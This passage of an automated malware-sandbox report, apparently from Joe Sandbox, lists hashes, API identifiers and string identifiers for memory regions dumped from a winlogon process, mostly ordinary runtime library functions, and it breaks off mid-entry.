                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 66111C347042C645FAFBA72959523F962419BE47F0F6847B5BC39466EEDE2CCF028608
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: ef941430167cb6942911e2266a7754952b4ee9def37cad19c030d044e1fadb84
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 27818B7161060386FBD6AB2A94413F96290AFE57E0F544639BE38477DEDA3CCF498708
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: f2fc9e50d80dcf80fc4ca459e6f8d64556b7fcd08f0b3d7ca7df50233bdedf36
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 1A31B031212A02D1FE979B42A4007F42295B7A9BF0F590735BD394B7D8EF3CDA498308
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 24ee0d3c3fdf8dc854bf28b68e46fc9f908ee672aa9e0ff533891e641e7e60b3
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: E2115E31210A4286E7918B56E84436966A0F7E8FF4F544334FE6A877D9CB7CCA148740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 9479a4e4da195d168078971477690de0f7ba99455b5b0671873ad8e27db6120e
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: CF31B736701B5682EE96CF56D5407B9A790FBE4BE0F484230BE9847B99EF3CC9618704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 69f9c49218e6240ed086ec77233dbfdd9bb5dabba28c9c0c825df301cb3e1b49
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: A0116D342406C286FAEBA72555553FD6242ABF47F0F644774BC3647ADEDE6C8F018608
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 6c8d3d93d8bfe3e2fe73925eee48ded896e6dd9d42efc55a8fd521349c15dbea
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 87016D31300B4282EB95DF52A4483A963A1F798BD1F984135FE6953798DF3CCA49C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7d372f96bd39070a0a19211413c30f0155ca6cd9137a14114fdefad3a2692b6c
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 4001A134201B0282EFA69F51E8087A563A0BBA4BE1F440635ED69073D8EF3CC6048704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: 287f6c13025e1d40a38e87b4e27fb4647a666ef3d6ef84ad5c099290c8d91569
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 73518232201602DAF7968B15D449BA93756F3A4BE8F618234FE264778CDB39EE41C708
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: bc5ae32632339b533cef1b2197eac90a425d8e38398b469f5566d1ddc85980dc
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: E4F0363230464292E7A18F15E8847A96760F7987E8FD44130FE594759CDA2CC74DCB04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 8d4205d73ecca294230dc073d23a78a6a4ff33a72a55b65ea912a8e03c6c850f
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: CCF0627121160681EB558F24E4443FA6320FBE47F1F940329FE7A461E8DF2DC7488340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 08e43dfad6d8615d8f85c57d7ba3ea724eca04319fcf64bf6a9629f1effc9644
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 48F08231704B8682EA818F17B9142B96260AB98FF0F884230FE6607B9CDF3CC6458700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                      • Instruction ID: 7c2467fcd7596e74ea46f889efb0ad8b7ca6e31623e23edea5d0d94c658ca5ce
                                                                      • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                      • Instruction Fuzzy Hash: 4C61B936519B41C6EAA1CB15E44436A77A0F3E87E5F501236FA9D47BE8DB7CCA408F04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 794d2f98abea2925b2b8cede53a2b7d91a83073eef87499136fa15848af996f8
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 01119E32A12B1311FAE7152CE8563F919C06BF83F5F788738BD76062EE9A2CCA415600
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: b511d5ba25b715f1dcfcca7696c36e76f84fb4604d3e81650d778d100f02beee
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: DD11513AA10E9331FAEA1768D4563F519516BF83F8F280734BD76066DE8AACCA454600
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 2241a7eeb7cf42f6862469b93fdda74b784df1d8e04a5361b92d205a9f787443
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 0E11A333A14E1311FAE4166AE4553F931B06BD8BF5F588738BD76562FECA2CCB414A00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 798ca2d8f1bf394026dd0354072af2df215992b6fdb75384f3c3813a05e348a0
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 40618F3260421242FAEB8A64D4403B9BAA0A7E57F0F604635FD3A137ECEB3CCA418640
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 71fcdac98b04f8c90e1cb381e77d598407ed309b185261e514eb70d2d2d45b85
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 4F617E3650024243FAE69AA5D5403BD6AA0E7E17E0F644735FD2A937ECDB3C8B41C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 7d0dfc8a691413f4dde3a8332c91cc347d6227e1e938a84b6f8a2983f74cfa34
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: BE616A32600B858AEB51DF65D4403ED77A1F3A4BE8F044225EF9917B98DB38DA95C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 634da43ffc88561904e9c766b05514423cef216fd51c5e43a622db91c593a43a
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: BB516132104382CAEBA68B1595443B977A0F3A5BE4F185325FF6947BD9EB3CD691C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: cdeba406e24003a3a0b1675a6f9d7472096d73f7c1ad2f2c69448a9297637e66
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: F0518F72100682CAEBA58F5594843A977A0F3A5BE5F144335FE6987BD9CB3CDE50C708
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: de6bc9e0d1430427b2a72eb52cbb69da6f06b7e4055c4c057576433a11f966a7
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 98515E36100282CBEBA98B9595443A877A0F3A5BE4F185325FE69C7BDDCB3CD690C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: e304355abc066f96e17f3cd7cdfa1338fafb4ef0b8800f9706e494f0d0c637c8
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: E2519F326016028BDB96CB25E454BA93795F3A4BE8F508234FE26477CCFB38CA458704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: ba53dc36e80807c3e2d48e7356b2653b066ac3483705aa10495dd9823df6bc95
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: C351903271160287DB96CB55E454FA937A5F3A4BE8F508234FE26877CCEB38CA418B44
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 1f122b48d9d6f5b20c7e8e545056d8ecb40dcf6bafc27ce726ad1e6dc5d3d349
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: D131907220164296E796DF11E8447A97764F7A0BE8F158234FE6A477CCEB3CCA40C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 284da866f2f5732ca223679ce680b25411ae6709bb61a3885cc83e3b25b646bf
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 1631903220164287EB96DF55E844BA93B64F390BE8F058224FE66837CCDB3CCA41CB44
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 48194c91b75594280cb710552ccab9c4b6c9696179c88a7cdcdc75127d28105e
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: 9ED1AF32714A8189EB52CFA5D4402EC7BB1F7A47E8F148225EE6997BDDDA3CC606C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: d3793489244d99d11474eaedf2291eb90a0db23d9d29e5d8d83fa4e484c9e938
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: D701CC32600A92D6EB85DF62E8041AA63A0FBA9FD1F545130FE6903759DE38C610C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 219b268d2508d01396f34f1c17f2a067e3db346685af521888a3d4dc08d7a7f4
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: 1F91D73370069685FF969FA584403FDABA0F7A4BE8F544225EE1A576CCDA7CC542C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: 60e99ca984fe45c8205c3015f8f1e509e2abf101529f829098595df2463e0b0f
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6D71B13620078286EAA69F6598843FAA694F3E57E4F440236FD6953BCDDA3CCF458704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 639785ff94cdbec34cdd26092e8e57918619dd365a49ed2093a17fdf676396e3
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 77617C33A00B458AEBA2DF65D4403ED7BA1F394BE8F144225EF6917B98EB38D655C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 768f49f300d8609a6abab68202dda315b1d19df14fbc99aa50587f3a5c2b46f2
